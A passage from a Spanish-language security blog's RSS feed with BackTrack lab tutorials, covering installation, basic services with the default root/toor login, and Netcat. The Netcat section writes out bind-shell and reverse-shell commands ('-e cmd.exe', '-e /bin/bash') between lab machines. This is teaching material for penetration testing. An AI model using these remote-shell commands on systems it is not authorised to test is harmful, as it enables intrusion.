		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">BackTrack es la herramienta indispensable para casi la totalidad de nuestros laboratorios, y los motivos ya han sido expuestos en muchas oportunidades.</p>
<p style="text-align: center;"><img class="aligncenter" title="backtrack 3" src="http://img232.imageshack.us/img232/8159/bt3qk2.jpg" alt="" width="450" height="355" /></p>
<p style="text-align: justify;">Dejo a continuación una corta definición y el enlace para más información en esta misma página de laboratorios sobre BackTrack.</p>
<p style="text-align: justify;">BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.</p>
<p style="text-align: justify;"><span id="more-407"></span>Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.<br />
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.</p>
<p>Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.<br />
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org</p>
<p style="text-align: justify;">(<a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank"><strong>Más información sobre BackTrack</strong></a>)</p>
<p style="text-align: justify;">Ahora publico un video tutorial que he realizado sobre la instalación de BackTrack 3 como sistema base de nuestra máquina.</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/73408823/91de9988/inst_backtrack3_LabsDragonJARorg.html " target="_blank"><strong>Descargar video tutorial de instalación de BackTrack 3 en disco duro</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3/feed</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, Netcat</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat#comments</comments>
		<pubDate>Thu, 06 Nov 2008 21:55:48 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=312</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Netcat (a menudo referida como la navaja multiusos de los hackers) es una herramienta de red bajo licencia GPL (en la versión de GNU) disponible para sistemas UNIX, Microsoft y Apple que permite a través de intérprete de comandos y con una sintaxis muy sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos).</p>
<p style="text-align: justify;"><span id="more-312"></span>Sus capacidades hacen que sea a menudo usada como una herramienta para abrir puertas traseras una vez invadido un sistema y obtenido privilegios de administrador o root del equipo. También resulta extremadamente útil a efectos de depuración para aplicaciones de red.</p>
<p style="text-align: justify;">Ya en desuso, originariamente se trataba de una potentísima herramienta de red para administradores no habiéndose descubierto hasta la fecha el total de los comandos que se utilizaban, los cuales permanecen secretos por las particularidades de esta herramienta. (<a href="http://netcat.sourceforge.net/" target="_blank"><strong>Más información &#8211; Web Oficial</strong></a>)</p>
<p style="text-align: justify;">En muchas ocasiones y por diferentes razones se hace necesario realizar conexiones a puertos TCP y UDP.</p>
<p style="text-align: justify;">Algunas de estas razones pueden ser:</p>
<ul style="text-align: justify;">
<li>Cuando necesitamos comprobar la disponibilidad de un puerto (si este se encuentra abierto o cerrado).</li>
<li>Cuando queremos leer el banner de dicho puerto (servicio gestionado por el mismo).</li>
<li>Cuando necesitamos conectarnos a un servicio de red de manera manual.</li>
</ul>
<p style="text-align: justify;">El modo de uso de netcat ya ha sido tratado de manera superficial en algunos laboratorios. Trataremos entonces de profundizar un poco más en este laboratorio sobre las posibilidades de la herramienta, aunque tampoco será la &#8220;Guía definitiva de Netcat&#8221;, si nos acercará un poco más a la misma.</p>
<p style="text-align: justify;">Algunas de las publicaciones donde he hecho referencia sobre netcat son las siguientes:</p>
<p style="text-align: justify;"><a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i" target="_blank"><strong>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Identificación de Banner’s (Banderas) I</strong></a><br />
<a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii" target="_blank"><strong>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Scanning II</strong></a><br />
<a href="http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-ii-de-viii" target="_blank"><strong>Solución del HackTaller 01 DragonJAR (II de VIII)</strong></a><br />
<a href="http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-iii-de-viii" target="_blank"><strong>Solución del HackTaller 01 DragonJAR (III de VIII)</strong></a></p>
<p style="text-align: justify;"><strong>Ayudas y Opciones de Comandos</strong></p>
<p style="text-align: justify;"><strong>Nota:</strong> Netcat es una herramienta que viene incluída y lista para ser usada desde la distribución Linux BackTrack, la cual es el objeto de estudio de esta serie de prácticas.</p>
<p style="text-align: justify;">Uno de los primero acercamientos a netcat que debe realizar cada investigador es la exploración del propio sistema de ayudas y opciones de comandos que incluye la herramienta. Para ello bastará con ejecutar la siguiente sintaxis desde la línea de comandos:</p>
<p style="text-align: justify;"><strong>nc -h</strong></p>
<p style="text-align: justify;">Para lo cual obtendremos el siguiente resultado:</p>
<p style="text-align: justify;"><strong>nc -h<br />
[v1.10]<br />
connect to somewhere: nc [-options] hostname port[s] [ports] &#8230;<br />
listen for inbound: nc -l -p port [-options] [hostname] [port]<br />
options:<br />
-e prog program to exec after connect [dangerous!!]<br />
-g gateway source-routing hop point[s], up to 8<br />
-G num source-routing pointer: 4, 8, 12, &#8230;<br />
-h this cruft<br />
-i secs delay interval for lines sent, ports scanned<br />
-l listen mode, for inbound connects<br />
-n numeric-only IP addresses, no DNS<br />
-o file hex dump of traffic<br />
-p port local port number<br />
-r randomize local and remote ports<br />
-s addr local source address<br />
-t answer TELNET negotiation<br />
-u UDP mode<br />
-v verbose [use twice to be more verbose]<br />
-w secs timeout for connects and final net reads<br />
-z zero-I/O mode [used for scanning]<br />
port numbers can be individual or ranges: lo-hi [inclusive]</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img511.imageshack.us/img511/996/netcat1px6.jpg" alt="" width="450" height="540" /></p>
<p style="text-align: justify;"><strong>Identificación de Banners e información</strong></p>
<p style="text-align: justify;">Para intentar una conexión y obtener información de un sistema y puerto específico la sintaxis es la siguiente:</p>
<p style="text-align: justify;"><strong>nc -vv IP/HostName Puerto</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img300.imageshack.us/img300/6339/netcat2by4.jpg" alt="" width="450" height="346" /></p>
<p style="text-align: justify;">Una vez visualizada la información requerida procedemos a detener la ejecución con la combinación de teclas Ctrl + C.</p>
<p style="text-align: justify;"><strong>Consultando el Servidor Web que gestiona un sistema Objetivo</strong></p>
<p style="text-align: justify;">Se trata de realizar una conexión al puerto comunmente utilizado para servir páginas Web (80), luego se envía una petición HTTP / HEAD para obtener y leer el banner del servidor HTTP. Para ello ejecutaremos la siguiente sintaxis:</p>
<p style="text-align: justify;"><strong>nc -vv IP/HostName Puerto</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/9316/netcat3bm2.jpg" alt="" width="450" height="366" /></p>
<p style="text-align: justify;"><strong>Netcat a la escucha sobre puertos TCP/UDP y Chat<br />
</strong></p>
<p style="text-align: justify;">Establecer a Netcat en modo &#8220;listen&#8221; (escucha) en un puerto TCP / UDP es una de las tareas más implementadas con la herramienta, pues permite depurar clientes y/o aplicaciones de red, envío/recepción de datos, ejecución de terminales, etc.</p>
<p style="text-align: justify;">Vamos como establecer a Netcat en modo &#8220;listen&#8221; (escucha) y como podemos implementar sobre el mismo un pequeño pero útil sistema de Chat entre dos equipos.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/9841/netcat4dt9.jpg" alt="" width="450" height="447" /></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img509.imageshack.us/img509/3803/netcat5vm4.jpg" alt="" width="450" height="414" /></p>
<p style="text-align: justify;">La máquina con Linux BackTrack será el sistema donde se establezca Netcat en modo &#8220;listen&#8221;, veamos:</p>
<p style="text-align: justify;"><strong>nc -lvv 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img354.imageshack.us/img354/7607/netcat6kb3.jpg" alt="" width="356" height="318" /></p>
<p style="text-align: justify;">El cliente será el sistema Windows</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img361.imageshack.us/img361/9703/netcat7tx4.jpg" alt="" width="450" height="409" /></p>
<p style="text-align: justify;"><strong>Transferencia de Archivos con Netcat</strong></p>
<p style="text-align: justify;">Otra de las bondades que permite realizar Netcat es la posibilidad de habilitar una conexión para transferir archivos entre dos equipos. Esto permitirá entonces enviar/recibir archivos de texto y/o binarios entre ellos.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">Debemos ejecutar la siguiente sintaxis:</p>
<p style="text-align: justify;"><strong>nc -lvp 12345 &gt; salida.txt</strong></p>
<p style="text-align: justify;">El equipo server (Linux BackTrack) estará habilitado en modo listen (escucha) y redireccionando los datos recibidos a un archivo de salida, veamos:</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img146.imageshack.us/img146/6551/netcat8ob1.jpg" alt="" width="395" height="321" /></p>
<p style="text-align: justify;">El equipo cliente (Windows) establecerá la conexión con BackTrack (al puerto 12345) y enviará el archivo.<br />
para ello primero crearemos el archivo de texto a enviar. Veamos:</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/8930/netcat9do1.jpg" alt="" width="463" height="239" /></p>
<p style="text-align: justify;">Así se vería desde el servidor BackTrack cuando recibe los datos</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img378.imageshack.us/img378/5779/netcat10os7.jpg" alt="" width="408" height="269" /></p>
<p style="text-align: justify;">Luego procedemos a comprobar la información contenida en el envío</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img136.imageshack.us/img136/9493/netcat11np8.jpg" alt="" width="415" height="292" /></p>
<p style="text-align: justify;"><strong>Administración Remota con Netcat (Shell)<br />
</strong></p>
<p style="text-align: justify;">Sin lugar a dudas esta es una de las mejores utilidades que se le pueda dar a Netcat, pues como hemos visto esta grandiosa herramienta permite redireccionar instrucciones y comandos. Esto significa que podemos tomar por ejemplo un archivo .exe y redirigir la entrada/salida y mensajes de error a los puertos TCP/UDP que establezcamos.</p>
<p style="text-align: justify;">Veamos en la práctica como podemos redirigir el ejecutable CMD.EXE a un cliente de red en un puerto local. De esta manera ofreceremos una línea de comandos a cualquier usuario que establezca una conexión a nuestro equipo y puerto establecido.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">Windows hará el papel de servidor, quién ofrecerá una línea de comandos a los clientes que establezcan una conexión con él.</p>
<p style="text-align: justify;"><strong>nc -lvp 12345 -e cmd.exe</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img243.imageshack.us/img243/2668/netcat12iu5.jpg" alt="" width="405" height="257" /></p>
<p style="text-align: justify;">Ahora desde BackTrack, quién actua como cliente, establecerá una conexión con Windows. Veamos:</p>
<p style="text-align: justify;"><strong>nc -v 10.30.3.116 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img151.imageshack.us/img151/7813/netcat13my1.jpg" alt="" width="413" height="373" /></p>
<p style="text-align: justify;"><strong>Shell Inversa con Netcat</strong></p>
<p style="text-align: justify;">A diferencia del escenario anterior y como en muchas ocasiones sucede, no se puede controlar y administrar las salidas/entradas o disposición de puertos. Para ello Netcat nos ofrece otra solución más en su repertorio. Se trata entonces de establacer a Netcat en modo &#8220;listen&#8221; y el posterior envío/recepción de comandos, entre ellos la ejecución de una terminal. Veamos:</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">En este caso el sistema Windows pretende obtener una shell del sistema Linux BackTrack, con la limitante de que BackTrack no puede en ese momento servir una shell en modo &#8220;Listen&#8221;.</p>
<p style="text-align: justify;">Desde Windows se establece el modo Listen:</p>
<p style="text-align: justify;"><strong>nc -lvp 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img262.imageshack.us/img262/6366/netcat14wp3.jpg" alt="" width="343" height="255" /></p>
<p style="text-align: justify;">Ahora desde Backtrack se establece la conexión hacia Windows y la instrucción que este deberá servir al mismo:</p>
<p style="text-align: justify;"><strong>nc -v 10.30.3.116 12345 -e /bin/bash</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img300.imageshack.us/img300/3433/netcat15fu3.jpg" alt="" width="411" height="367" /></p>
<p style="text-align: justify;">Enviemos una instrucción (comando) desde Windows para que el resultado pueda ser visualizado desde el mismo.</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img146.imageshack.us/img146/1160/netcat17ja3.jpg" alt="" width="450" height="321" /></p>
<p style="text-align: justify;">Estos son solo algunos de los muchos usos que se le pueden dar a Netcat, por ello es que se le conoce como la navaja suiza de las redes <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> .</p>
<p style="text-align: justify;">A partir de este momento queda abierto el espacio para que los interesados profundicen en el uso de la herramienta.</p>
<p style="text-align: justify;">Recomiento la lectura de estas páginas web, donde se detallan algunos usos e información de la herramienta:</p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Netcat" target="_blank"><strong>Crysol<br />
Netcat en la Wikipedia</strong></a><br />
<a href="http://netcat.sourceforge.net/" target="_blank"><strong>Web Oficial de Netcat</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, servicios básicos</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos#comments</comments>
		<pubDate>Thu, 28 Aug 2008 16:14:25 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Servicios]]></category>
		<category><![CDATA[SSH]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[TFTP]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[VNC]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=226</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">BackTrack incluye algunos servicios de red por defecto, entre ellos HTTPD, SSHD, TFTP, VNC SERVER, etc. Estos servicios pueden ser utilizados en diferentes situaciones en un Test de Penetración (conexión remota a un equipo, transferencia de archivos, etc).</p>
<p style="text-align: justify;"><strong>Objetivos del laboratorio:</strong></p>
<ol style="text-align: justify;">
<li>Familiarizarse con la suite de herramientas incluídas en BackTrack.</li>
<li>Cambiar la contrseña que viene por defecto en BackTrack.</li>
<li>Conocer los direferentes servicios disponibles en BackTrack (básicos).</li>
<li>Configurar y poner en marcha los servicios básicos de BackTrack.</li>
<li>Comprobar la disponibilidad de los servicios básicos de BackTrack.</li>
<li>Realizar pruebas de conexión a los servicios de BackTrack.</li>
</ol>
<p style="text-align: justify;"><span id="more-226"></span>Veamos como iniciar con backtrack</p>
<p style="text-align: justify;">Sistema de <a href="http://es.wikipedia.org/wiki/Booteo" target="_blank"><strong>booteo</strong></a> de BackTrack</p>
<p style="text-align: justify;"><a href="http://img125.imageshack.us/img125/1193/10lu0.jpg" target="_blank"><img src="http://img125.imageshack.us/img125/1193/10lu0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>Termina de reconocer y configurar algunos de los dispositivos físicos, luego de cargar estos dispositivos nos ofrece una pantalla de bienvenida, con información de configuración, además de una pantalla de <a href="http://es.wikipedia.org/wiki/Login" target="_blank"><strong>login</strong></a>. La pantalla nos invita a configurar nuestro sistema con algunos comandos, después de logearnos como root.</p>
<p style="text-align: justify;"><a href="http://img223.imageshack.us/img223/7536/11od8.jpg" target="_blank"><img src="http://img223.imageshack.us/img223/7536/11od8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>Para logearnos en el sistema ingresamos:<br />
usuario: <strong>root</strong><br />
contraseña: <strong>toor</strong></p>
<p style="text-align: justify;"><a href="http://img204.imageshack.us/img204/2664/12oo4.jpg" target="_blank"><img src="http://img204.imageshack.us/img204/2664/12oo4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Si desde el comienzo seleccionamos la opción de acceso a la red mediante NAT (VMWare), podemos observar gracias al comando <a href="http://es.wikipedia.org/wiki/Ifconfig" target="_blank"><strong>ifconfig</strong></a> nuestras interfaces de red.</p>
<p style="text-align: justify;"><a href="http://img106.imageshack.us/img106/7615/13ab6.jpg" target="_blank"><img src="http://img106.imageshack.us/img106/7615/13ab6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Luego podemos configurar el entorno gráfico (xconf) y cargarlo mediante el comando <a href="http://es.tldp.org/FAQ/FAQ_Linux/Html/FAQ_Linux-6.html" target="_blank"><strong>startx<br />
</strong></a> ó Flux (según nuestras preferencias de uso)</p>
<p style="text-align: justify;"><a href="http://img130.imageshack.us/img130/4568/14jg6.jpg" target="_blank"><img src="http://img130.imageshack.us/img130/4568/14jg6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>Entorno gráfico cargando.</p>
<p style="text-align: justify;"><a href="http://img230.imageshack.us/img230/7319/15bw9.jpg" target="_blank"><img src="http://img230.imageshack.us/img230/7319/15bw9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong>BackTrack cargado como Live CD en su totalidad.</p>
<p style="text-align: justify;"><a href="http://img124.imageshack.us/img124/4858/31hm3.jpg" target="_blank"><img src="http://img124.imageshack.us/img124/4858/31hm3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Es importante destacar que el éxito de BackTrack reside en la excelente organización y disposición por grupos de herramientas:</p>
<ol style="text-align: justify;">
<li>Recolección de información</li>
<li>Mapeo de red</li>
<li>Identificación de vulnerabilidades</li>
<li>Penetración / Explotación</li>
<li>Escalada de privilegios</li>
<li>Mantenimiento del acceso</li>
<li>Servicios de red inalámbrica</li>
<li>Telefonía sobre VoIP</li>
<li>Informática Forense</li>
<li>Ingeniería inversa</li>
</ol>
<p style="text-align: justify;">También  podemos ingresar a los diferentes grupos de herramientas desde la línea de comandos:</p>
<p style="text-align: justify;"><strong>cd /pentest/</strong></p>
<p style="text-align: justify;"><a href="http://img172.imageshack.us/img172/9676/75183728mt7.jpg"><img src="http://img172.imageshack.us/img172/9676/75183728mt7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Uno de los primero pasos a realizar debe ser el cambio de contraseña que viene por defecto en backtrack, para ello bastará con ejecutar la siguiente instrucción en la línea de comandos:</p>
<p style="text-align: justify;"><strong>passwd</strong></p>
<p style="text-align: justify;">y seguir las instrucciones para completar el cambio</p>
<p><a href="http://img165.imageshack.us/img165/9905/52389028kw9.jpg"><img src="http://img165.imageshack.us/img165/9905/52389028kw9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Veremos ahora como identificar y habilitar servicios básicos en backtrack</p>
<p style="text-align: justify;"><strong>SSH (Secure Shell)</strong></p>
<p style="text-align: justify;">Empecemos por generar y habilitar el servicio de conexiones seguras (SSHD &#8211; Secure Shell Daemon), para ello y desde la línea de comandos ejecutamos la siguiente sintáxis</p>
<p style="text-align: justify;"><strong>sshd-generate</strong></p>
<p><a href="http://img381.imageshack.us/img381/7827/80769068hf2.jpg"><img src="http://img381.imageshack.us/img381/7827/80769068hf2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Una vez generado nuestro servicio, iniciaremos el mismo como conexión segura:</p>
<p style="text-align: justify;"><strong>/usr/sbin/sshd</strong></p>
<p><a href="http://img136.imageshack.us/img136/6959/20870314mr8.jpg"><img src="http://img136.imageshack.us/img136/6959/20870314mr8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora, si deseamos comprobar la disponibilidad del servicio de conexiones seguras, basta con ejecutar el siguiente comando para mostrar las conexiones activas y a la escucha en nuestra máquina (para este caso solo consultamos para el puerto 22, puerto usado generalmente para este tipo de conexiones):</p>
<p style="text-align: justify;"><strong>netstat -ant|grep 22</strong></p>
<p><a href="http://img514.imageshack.us/img514/6458/99595389wj2.jpg"><img src="http://img514.imageshack.us/img514/6458/99595389wj2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Podemos hacer una prueba de conexión desde otro sistema, veamos:</p>
<p><a href="http://img257.imageshack.us/img257/2950/38574624hz7.jpg"><img src="http://img257.imageshack.us/img257/2950/38574624hz7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><strong>&#8212; Servidor Apache &#8212;<br />
</strong></p>
<p style="text-align: justify;">BackTrack incluye por defecto una instalación del servidor Web Apache, veamos como ponerlo en marcha.</p>
<p style="text-align: justify;"><strong>Nota:</strong> Cabe aclarar que la mayoría de estos servicios pueden ser ejecutados desde el menu incluído en K-Menú, Servicios. Solo estamos viendo otros métodos en caso de que lo queremos hacer o bien sea, más rápido, ó cuando no tengamos disponible el entorno gráfico.</p>
<p style="text-align: justify;">Pongamos en marcha el servicio de apache desde la línea de comandos:</p>
<p style="text-align: justify;"><strong>apachectl start</strong></p>
<p style="text-align: justify;">Y comprobemos la disponiblidad del servicio</p>
<p style="text-align: justify;"><strong>netstat -ant|grep 80</strong></p>
<p><a href="http://img165.imageshack.us/img165/148/99192940en1.jpg"><img src="http://img165.imageshack.us/img165/148/99192940en1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora desde un navegador Web</p>
<p><a href="http://img413.imageshack.us/img413/3131/52594955jp8.jpg"><img src="http://img413.imageshack.us/img413/3131/52594955jp8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Para detener el servicio solo basta ejecutar la instrucción stop.</p>
<p style="text-align: justify;"><strong>apachectl stop</strong></p>
<p><a href="http://img98.imageshack.us/img98/2964/85170941ku3.jpg"><img src="http://img98.imageshack.us/img98/2964/85170941ku3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><strong>&#8212; TFTP (Trivial File Transfer Protocol &#8211; Protocolo de transferencia de archivos trivial) &#8212;<br />
</strong></p>
<p style="text-align: justify;">Veamos como poner en marcha el servidor TFTP que incluye por defecto el S.O BackTrack.</p>
<p style="text-align: justify;">Desde la línea de comandos ejecutamos la siguiente instrucción:</p>
<p style="text-align: justify;"><strong>atftpd &#8211;daemon &#8211;port 69 /tap/</strong></p>
<p><a href="http://img222.imageshack.us/img222/2558/10pt0.jpg"><img src="http://img222.imageshack.us/img222/2558/10pt0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora comprobemos la disponiblidad del servicio</p>
<p style="text-align: justify;"><strong>netstat -anu|grep 69</strong></p>
<p><a href="http://img257.imageshack.us/img257/8765/11fd3.jpg"><img src="http://img257.imageshack.us/img257/8765/11fd3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Hagamos una prueba de transferencia de archivos</p>
<p><a href="http://img54.imageshack.us/img54/6685/14ih6.jpg"><img src="http://img54.imageshack.us/img54/6685/14ih6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><strong>&#8212; VNC &#8212;<br />
</strong></p>
<p style="text-align: justify;">Veamos como configurar y poner en marcha nuestro propio servicio de VNC en BackTrack, para ello ejecutamos la siguiente instrucción:</p>
<p style="text-align: justify;"><strong>vncserver</strong></p>
<p style="text-align: justify;">Solo tenemos que seguir las intrucciones en pantalla (definir contraseña de acceso)</p>
<p><a href="http://img165.imageshack.us/img165/2155/12eo7.jpg"><img src="http://img165.imageshack.us/img165/2155/12eo7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Verifiquemos que nuestra máquina realmente está a la escucha de nuevas conexiones, para ello ejecutamos la siguiente instrucción:</p>
<p style="text-align: justify;"><strong>netstat -ant|grep 590</strong></p>
<p><a href="http://img98.imageshack.us/img98/1725/13km7.jpg"><img src="http://img98.imageshack.us/img98/1725/13km7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora hagamos una prueba de conexión desde otra máquina</p>
<p><a href="http://img237.imageshack.us/img237/9662/vnc1wq0.jpg"><img src="http://img237.imageshack.us/img237/9662/vnc1wq0.th.jpg" alt="" /></a></p>
<p><a href="http://img185.imageshack.us/img185/9515/vnc2cq1.jpg"><img src="http://img185.imageshack.us/img185/9515/vnc2cq1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Aquí termina el laboratorio sobre habilitación, configuración y prueba de servicios básicos en BackTrack. Estos mismo servicios pueden ser habilitados de manera gráfica en el propio menú K de BackTrack, además pueden ser encontrados algunos otros instalados por defecto en el sistema, esta será la práctica para cada uno de los seguidores de los laboratorios, espero que sean enviadas las capturas de pantallas, además de los comentarios sobre el mismo.</p>
<p style="text-align: justify;">
<p style="text-align: justify;">
<p style="text-align: justify;"><strong>Palabras clave:</strong><a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank"><br />
Apache</a>, <a href="http://es.wikipedia.org/wiki/VNC" target="_blank">VNC</a>, <a href="http://es.wikipedia.org/wiki/TFTP" target="_blank">TFTP</a>, <a href="http://es.wikipedia.org/wiki/SSH" target="_blank">SSH</a>, <a href="http://www.kriptopolis.org/backtrack" target="_blank">BackTrack</a>, <a href="http://es.wikipedia.org/wiki/Arranque" target="_blank">Booteo</a>, <a href="http://es.wikipedia.org/wiki/NAT" target="_blank">NAT</a>, <a href="http://es.wikipedia.org/wiki/VMware" target="_blank">VMWare</a></p>
<p style="text-align: justify;"><strong>Nota:</strong><br />
Este nuevo recurso está basado en el sistema de entrenamiento ofrecido por los desarrolladores y colaboradores del proyecto BackTrack (Remote-Exploit) <a href="http://www.offensive-security.com/" target="_blank">Offensive-security.com</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, Conceptos básicos</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos#comments</comments>
		<pubDate>Mon, 25 Aug 2008 18:22:40 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[LiveCD]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=215</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>BackTrack</strong><br />
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.<br />
Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.<br />
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.</p>
<p style="text-align: justify;"><span id="more-215"></span>Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.<br />
